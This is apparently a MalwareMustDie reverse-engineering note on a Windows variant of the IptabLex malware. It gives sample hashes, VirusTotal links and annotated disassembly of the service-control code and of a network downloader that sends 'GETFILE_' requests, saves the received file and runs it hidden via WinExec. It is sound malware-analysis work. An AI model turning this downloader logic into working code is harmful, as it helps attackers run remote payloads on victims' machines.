- #PoC that a Windows version of IptabLeX exists:
- #MalwareMustDie! analyzed by: @unixfreaxjp
- Case based on: http://blog.malwaremustdie.org/2014/06/mmd-0025-2014-itw-infection-of-elf.html
- //--------------------------------
- // Sample:
- //--------------------------------
- VT: https://www.virustotal.com/en/file/803e3f94d3e7b7ca6ebdb5194a08e13df0e9fd3bb4f2b226bec2ffb50b688002/analysis/1413370561/
- MD5 : 67877403DB7F8CE451B72924188443F8
- Format : Portable executable for 80386 (PE) x32
- OS type : MS Windows
- VT: https://www.virustotal.com/en/file/ea817834fff18e40581f096371be2a7eb062325475805e2b9c51d186ac820137/analysis/1413194264/
- MD5 : 519048ffc7f6c38ab8cb4e0ddac3fad3
- Format : Portable executable for 80386 (PE) x32
- OS type : MS Windows
- //--------------------------------
- // Same use of the test URLs as in the referenced ELF case (the string at 0x40D216 is consumed by the loop below):
- //--------------------------------
- // Byte-transform loop (re-entered from the jnz at 0x402203). The loop setup is
- // outside this excerpt: eax (table index), esi (second input buffer), cl
- // (constant, never written inside the loop) and edi (byte count) are all
- // initialised before 0x4021EB.
- // Per iteration: name[eax] = table[eax] - cl + [esi] - 0x73; esi++; eax++; edi--.
- 0x4021EB mov dl, ds:byte_0x40D215[eax] // ----> (3) table byte. NOTE: the base is 0x40D215, one byte BEFORE the URL string at 0x40D216; which byte is read first depends on eax's initial value (set before the excerpt)
- 0x4021F1 mov bl, [esi] // byte from the second input buffer (role not visible here)
- 0x4021F3 sub dl, cl // cl is loop-invariant
- 0x4021F5 add dl, bl
- 0x4021F7 sub dl, 73h // constant 0x73
- 0x4021FA inc esi
- 0x4021FB mov byte ptr name[eax], dl // output byte
- 0x402201 inc eax
- 0x402202 dec edi // edi = bytes remaining
- 0x402203 jnz short loc_4021EB
- 0x402205 pop ebx
- .rdata:0x40D216 // <------(3) data read through byte_0x40D215[eax] above
- .rdata:0x40D216 aWww_yahoo_com_ db /www.yahoo.com.http://www.baidu.com.
- .rdata:0x40D216 db http://www.china.com.http://www.ifeng.com,0
- //--------------------------------
- // IptabLex service handling (queries the service and stops it if it is running):
- //--------------------------------
- // Stop "IptabLex Services" if it is running: open the SCM, open the service
- // with query/start/stop rights, query its state and, only when the state is
- // SERVICE_RUNNING, send SERVICE_CONTROL_STOP. The excerpt ends right after
- // ControlService; anything that follows (a StartService/re-install would fit
- // the SERVICE_START right requested below) is not shown.
- 0x4034E0 ServiceSus = _SERVICE_STATUS ptr -1Ch // local SERVICE_STATUS (referenced below as ServiceStatus)
- 0x4034E0 sub esp, 1Ch
- 0x4034E3 push edi
- 0x4034E4 push 20000000h // dwDesiredAccess = GENERIC_EXECUTE
- 0x4034E9 push 0 // lpDatabaseName = NULL (active services database)
- 0x4034EB push 0 // lpMachineName = NULL (local machine)
- 0x4034ED call ds:OpenSCManagerA
- 0x4034F3 mov edi, eax // edi = hSCManager
- 0x4034F5 test edi, edi
- 0x4034F7 jz short loc_403542 // SCM open failed -> leave (target outside the excerpt)
- 0x4034F9 push ebx
- 0x4034FA push esi
- 0x4034FB push 34h; dwDesiredAccess = SERVICE_QUERY_STATUS (4) | SERVICE_START (0x10) | SERVICE_STOP (0x20)
- 0x4034FD push offset String // <==== "IptabLex Services"
- 0x403502 push edi; hSCManager
- 0x403503 call ds:OpenServiceA
- 0x403509 mov ebx, ds:CloseServiceHandle // ebx = &CloseServiceHandle; presumably for the cleanup paths at loc_40353A/loc_40353D, which are outside the excerpt
- 0x40350F mov esi, eax // esi = hService
- 0x403511 test esi, esi
- 0x403513 jz short loc_40353D // service not installed / no access -> skip
- 0x403515 lea eax, [esp+28h+ServiceStatus]
- 0x403519 push eax; lpServiceStatus
- 0x40351A push esi; hService
- 0x40351B call ds:QueryServiceStatus
- 0x403521 test eax, eax
- 0x403523 jz short loc_40353A // query failed
- 0x403525 cmp [esp+28h+ServiceStatus.dwCurrentState], 4 // 4 = SERVICE_RUNNING
- 0x40352A jnz short loc_40353A // not running -> nothing to stop
- 0x40352C lea ecx, [esp+28h+ServiceStatus]
- 0x403530 push ecx; lpServiceStatus
- 0x403531 push 1 ; dwControl = SERVICE_CONTROL_STOP
- 0x403533 push esi; hService
- 0x403534 call ds:ControlService // stops the running service; the excerpt ends here
- //--------------------------------
- // DDOS FUNCTION (so labelled by the author; what is visible below is a retry loop around a fetch-verify-execute routine — the flood itself is not in this excerpt):
- //--------------------------------
- // DWORD __stdcall sub_402680(LPVOID)
- // Thread routine. The author labels it the flood thread, but the code shown
- // here only drives sub_402460 (the fetch-verify-execute routine below) in a
- // retry loop: up to 5 attempts, 3 s apart, stopping at the first success.
- // The argument is a block read at unaligned offsets:
- //   [eax+1] dword -> edi  (passed as the "int"; sub_402460 stores it as sin_addr)
- //   [eax+5] word  -> bx   (port, host byte order; htons'd by the callee)
- //   [eax+7] word  -> bp   (2-byte value the callee sends to the server first)
- // Exit targets 0x4026C2/0x4026C5 are outside this excerpt ([...]).
- 0x402680 mov eax, [esp+arg_0]
- 0x402684 pus esi // ("pus" = push throughout this transcription)
- 0x402685 xor esi, esi // esi = attempt counter
- 0x402687 test eax, eax
- 0x402689 jz short 0x4026C5 // NULL argument -> exit
- 0x40268B pus ebx
- 0x40268C mov bx, [eax+5] // 16-bit load: the upper half of ebx keeps the caller's value
- 0x402690 pus ebp
- 0x402691 mov bp, [eax+7] // same for ebp; the full 32-bit registers are pushed as arguments below, so only the low words are meaningful
- 0x402695 pus edi
- 0x402696 mov edi, [eax+1]
- 0x402699 pus eax
- 0x40269A call 0x4056A0 // one-arg cdecl call on the argument block (author: runtime library; the block is not referenced again, so plausibly free — confirm)
- 0x40269F add esp, 4
- 0x4026A2
- 0x4026A2 loc_0x4026A2: // xref:0x4026C0 <---(2) retry loop head
- 0x4026A2 push ebp// buf (only the low word, from [eax+7], is used)
- 0x4026A3 push ebx// hostshort (low word, from [eax+5])
- 0x4026A4 push edi// int (dword from [eax+1])
- 0x4026A5 inc esi // attempt++
- 0x4026A6 call 0x402460 // ----->(1) sub_402460 below: connect, fetch a file, verify it, WinExec it; returns 1 if it ran something, 0 otherwise
- :
- 0x4026AB add esp, 0Ch
- 0x4026AE test eax, eax
- 0x4026B0 jnz short 0x4026C2 // success -> leave the loop
- 0x4026B2 push 0BB8h // dwMilliseconds = 3000
- 0x4026B7 call ds:Sleep // 3 s between attempts
- 0x4026BD cmp esi, 5
- 0x4026C0 jl short 0x4026A2 ----------->(2) //loop: retry while fewer than 5 attempts have been made
- [...]
- // int __cdecl sub_0x402460(int, u_short hostshort, char buf)
- //   (1) Called from the retry loop at 0x4026A6. Fetch-verify-execute:
- //   connect to (arg0 = IPv4 address, arg1 = port); send the low 2 bytes of
- //   arg2; expect a reply of exactly 4 bytes, R; send "GETFILE_%08X"
- //   formatted with R (NUL included); write everything received afterwards
- //   to a local file; then run the file with WinExec only if a 32-bit value
- //   computed over it by 0x4023A0 equals R.
- //   Returns 1 when WinExec was reached, 0 otherwise. esi = socket throughout.
- //   R is supplied by the same peer that sends the file, so the comparison at
- //   0x402627 can at most catch a truncated transfer; it is not an
- //   authenticity check on the payload.
- //   Network fingerprint visible here: 2-byte client hello, 4-byte reply, then
- //   the ASCII request "GETFILE_" + 8 hex digits + NUL.
- //   Frame (base = esp after the four register pushes; locals = 0x914 bytes):
- //     base+0x10   dword       R (zeroed at 0x402470, written at 0x402568)
- //     base+0x14   sockaddr_in (sin_family +0, sin_port +2, sin_addr +4)
- //     base+0x24   path buffer, 0x100 bytes
- //     base+0x124  recv / format buffer, 0x800 bytes
- //     base+0x928 / +0x92C / +0x930 = arg0 / arg1 / arg2
- //   Transcription notes: "pus" = push; hex immediates are written
- //   inconsistently (0x0914, 0C, 00000800); the helpers called by address are
- //   described by their argument shape only — their names are guesses to confirm.
- 0x402460 sub esp, 0x0914 // xref: 0x4026A6 <-------(1)
- 0x402466 pus ebx
- 0x402467 pus ebp
- 0x402468 pus esi
- 0x402469 pus edi
- 0x40246A pus 0x00 // protocol = 0
- 0x40246C pus 0x01 // type = SOCK_STREAM
- 0x40246E pus 0x02 // af = AF_INET
- 0x402470 mov dword ptr [esp+1C], 0x00 // R (base+0x10) = 0
- 0x402478 call dword ptr [0x40D1E4] // socket@WS2_32.DLL (Import, 3 Params)
- 0x40247E mov esi, eax // esi = socket
- 0x402480 test esi, esi
- 0x402482 jl 0x40266B // INVALID_SOCKET (-1) -> return 0
- 0x402488 mov eax, dword ptr [esp+0000092C] // arg1 = port, host byte order
- 0x40248F mov word ptr [esp+14], 0002 // sin_family = AF_INET
- 0x402496 pus eax
- 0x402497 call dword ptr [0x40D1B8] // htons@WS2_32.DLL (Import, 1 Params)
- 0x40249D mov ecx, dword ptr [esp+00000928] // arg0 = IPv4 address
- 0x4024A4 lea edx, dword ptr [esp+14] // &sockaddr_in
- 0x4024A8 pus 0x10 // namelen = 16
- 0x4024AA pus edx
- 0x4024AB pus esi
- 0x4024AC mov word ptr [esp+22], ax // sin_port (base+0x16)
- 0x4024B1 mov dword ptr [esp+24], ecx // sin_addr (base+0x18)
- 0x4024B5 call dword ptr [0x40D1E8] // connect@WS2_32.DLL (Import, 3 Params)
- 0x4024BB test eax, eax
- 0x4024BD jl 0x40266B // SOCKET_ERROR -> return 0. Neither close call (0x4025FE / 0x402663) is reached on this path, so the socket handle leaks once per failed connect in the retry loop
- 0x4024C3 mov ecx, 00000x40 // 0x40 dwords = 0x100 bytes
- 0x4024C8 xor eax, eax
- 0x4024CA lea edi, dword ptr [esp+24] // path buffer (base+0x24)
- 0x4024CE rep stosd // zero it
- 0x4024D0 lea eax, dword ptr [esp+24]
- 0x4024D4 pus eax
- 0x4024D5 call 0x4023E0 // target: 0x4023E0 — (path buffer): fills in the path; its contents are not visible here
- 0x4024DA lea edi, dword ptr [esp+28] // path (esp is 4 lower after the push above)
- 0x4024DE or ecx, FFFFFFFF
- 0x4024E1 xor eax, eax
- 0x4024E3 repne scasb // inline strlen(path)
- 0x4024E5 not ecx
- 0x4024E7 dec ecx // ecx = strlen(path)
- 0x4024E8 lea ecx, dword ptr [esp+ecx+28] // path + strlen(path): points at the terminating NUL
- 0x4024EC pus ecx
- 0x4024ED call 0x4020E0 // target: 0x4020E0 — given the end of the path; presumably appends a file name (not visible here)
- 0x4024F2 mov ebp, dword ptr [0x40D1EC] // send@WS2_32.DLL (Import, 4 Params); ebp = &send
- 0x4024F8 add esp, 08 // cleans up both 1-arg cdecl calls above
- 0x4024FB lea edx, dword ptr [esp+00000930] // &arg2
- 0x402502 pus 0x00 // flags
- 0x402504 pus 0x02 // len = 2: only the low word of arg2 is sent
- 0x402506 pus edx
- 0x402507 pus esi
- 0x402508 call ebp // send@WS2_32.DLL (Import, 4 Params) — 2-byte hello
- 0x40250A cmp eax, 02
- 0x40250D jne 0x4025FD // hello not fully sent -> skip the download; 0x4025FD still checks for an existing file, with R == 0
- 0x402513 mov ebx, dword ptr [0x40D1F0] // recv@WS2_32.DLL (Import, 4 Params); ebx = &recv
- 0x402519 mov ecx, 00000200 // 0x200 dwords = 0x800 bytes
- 0x40251E xor eax, eax
- 0x402520 lea edi, dword ptr [esp+00000124] // recv buffer (base+0x124)
- 0x402527 rep stosd // zero it
- 0x402529 pus eax // flags = 0
- 0x40252A lea eax, dword ptr [esp+00000128] // recv buffer (esp is 4 lower)
- 0x402531 pus 00000800 // len = 0x800
- 0x402536 pus eax
- 0x402537 pus esi
- 0x402538 call ebx// recv@WS2_32.DLL (Import, 4 Params)
- 0x40253A cmp eax, 04
- 0x40253D jne 0x402662 // reply must be exactly 4 bytes, else close and fail
- 0x402543 mov edx, dword ptr [esp+00000124] // R = the 4-byte reply as received (no byte-order conversion)
- 0x40254A mov ecx, 00000200
- 0x40254F xor eax, eax
- 0x402551 lea edi, dword ptr [esp+00000124]
- 0x402558 rep stosd // zero the buffer again; it is reused as the format output
- 0x40255A pus edx // R
- 0x40255B lea ecx, dword ptr [esp+00000128] // buffer (base+0x124)
- 0x402562 pus 0x40F070 // ASCII "GETFILE_%08X" <==== GET COMMAND (format string)
- 0x402567 pus ecx
- 0x402568 mov dword ptr [esp+1C], edx // save R at base+0x10 for the comparison at 0x402627
- 0x40256C call 0x405E8A // target: 0x405E8A — (buffer, format, R): sprintf-like; produces "GETFILE_" + R as 8 hex digits
- 0x402571 lea edi, dword ptr [esp+00000130] // buffer (esp is 12 lower; still base+0x124)
- 0x402578 or ecx, FFFFFFFF
- 0x40257B xor eax, eax
- 0x40257D add esp, 0C
- 0x402580 repne scasb // inline strlen(request)
- 0x402582 not ecx
- 0x402584 dec ecx
- 0x402585 pus eax // flags = 0
- 0x402586 mov edi, ecx
- 0x402588 lea edx, dword ptr [esp+00000128] // request buffer
- 0x40258F inc edi // len = strlen + 1: the NUL terminator is sent as well
- 0x402590 pus edi
- 0x402591 pus edx
- 0x402592 pus esi
- 0x402593 call ebp // send@WS2_32.DLL (Import, 4 Params)
- 0x402595 cmp eax, edi
- 0x402597 jne 0x402662 // short send -> close and fail
- 0x40259D lea eax, dword ptr [esp+24] // path
- 0x4025A1 pus 0x40F068 // unnamed string constant (second argument)
- 0x4025A6 pus eax
- 0x4025A7 call 0x405D3E // target: 0x405D3E — (path, string) -> handle; used like fopen(path, mode) below — confirm
- 0x4025AC mov ebp, eax // ebp = file handle (ebp no longer holds &send)
- 0x4025AE add esp, 08
- 0x4025B1 test ebp, ebp
- 0x4025B3 je 0x4025FD // could not open: skip the download, close the socket and fall through to the existing-file check
- 0x4025B5 mov ecx, 00000200 // xref: 0x4025F2 — download loop head
- 0x4025BA xor eax, eax
- 0x4025BC lea edi, dword ptr [esp+00000124]
- 0x4025C3 pus eax // flags = 0
- 0x4025C4 rep stosd // zero the recv buffer
- 0x4025C6 lea ecx, dword ptr [esp+00000128]
- 0x4025CD pus 00000800
- 0x4025D2 pus ecx
- 0x4025D3 pus esi
- 0x4025D4 call ebx recv@WS2_32.DLL (Import, 4 Params)
- 0x4025D6 mov edi, eax // edi = bytes received
- 0x4025D8 test edi, edi
- 0x4025DA jle 0x4025F4 // 0 (peer closed) or SOCKET_ERROR -> end of download; both are treated the same
- 0x4025DC pus ebp // handle
- 0x4025DD pus edi // count
- 0x4025DE lea edx, dword ptr [esp+0000012C] // buffer (esp is 8 lower)
- 0x4025E5 pus 0x01 // size = 1
- 0x4025E7 pus edx
- 0x4025E8 call 0x405D51 // target: 0x405D51 — (buffer, 1, count, handle): fwrite-like
- 0x4025ED add esp, 10
- 0x4025F0 cmp eax, edi
- 0x4025F2 je 0x4025B5 // everything written -> receive more; a short write just ends the loop and is not reported
- 0x4025F4 pus ebp // xref: 0x4025DA
- 0x4025F5 call 0x405A54 // target: 0x405A54 — (handle): fclose-like
- 0x4025FA add esp, 0x04
- 0x4025FD pus esi // xref: 0x40250D 0x4025B3
- 0x4025FE call 0x407E3E // target: 0x407E3E — (socket): closesocket-like; also reached when the hello send or the open failed
- 0x402603 lea eax, dword ptr [esp+28] // path (esp is 4 lower)
- 0x402607 pus 0x00
- 0x402609 pus eax
- 0x40260A call 0x40CE32 // target: 0x40CE32 — (path, 0); 0 means "go on": an _access(path, 0)-style existence check would fit — confirm
- 0x40260F add esp, 0C // cleans the esi push plus the two above
- 0x402612 test eax, eax
- 0x402614 jne 0x40266B // file not usable -> return 0
- 0x402616 lea ecx, dword ptr [esp+24]
- 0x40261A pus ecx
- 0x40261B call 0x4023A0 // target: 0x4023A0 — (path) -> 32-bit value over the file (checksum or size; not visible here)
- 0x402620 mov ecx, dword ptr [esp+14] // R (base+0x10)
- 0x402624 add esp, 0x04
- 0x402627 cmp eax, ecx
- 0x402629 je 0x402645 // value matches what the server announced -> execute
- 0x40262B lea edx, dword ptr [esp+24]
- 0x40262F pus edx
- 0x402630 call 0x402450 // target: 0x402450 — (path) on mismatch; probably removes the file (not visible)
- 0x402635 add esp, 0x04
- 0x402638 xor eax, eax // return 0
- 0x40263A pop edi
- 0x40263B pop esi
- 0x40263C pop ebp
- 0x40263D pop ebx
- 0x40263E add esp, 0x0914
- 0x402644 ret // function end 0x402460
- 0x402645 lea eax, dword ptr [esp+24] // xref: 0x402629 — path
- 0x402649 pus 0x00 // uCmdShow = SW_HIDE
- 0x40264B pus eax // lpCmdLine = path
- 0x40264C call dword ptr [0x40D0EC] // WinExec@KERNEL32.DLL (Import, 2 Params) — return value is discarded
- 0x402652 pop edi
- 0x402653 pop esi
- 0x402654 pop ebp
- 0x402655 mov eax, 0x01 // return 1 = executed
- 0x40265A pop ebx
- 0x40265B add esp, 0x0914
- 0x402661 ret // function end 0x402460
- 0x402662 pus esi // xref: 0x40253D 0x402597 — close the socket, then fail
- 0x402663 call 0x407E3E // target: 0x407E3E
- 0x402668 add esp, 0x04
- 0x40266B pop edi // xref: 0x402482 0x4024BD 0x402614 — common failure exit: return 0
- 0x40266C pop esi
- 0x40266D pop ebp
- 0x40266E xor eax, eax
- 0x402670 pop ebx
- 0x402671 add esp, 0x0914
- 0x402677 ret
- ;;------------------
- ;; #MalwareMUSTDIe!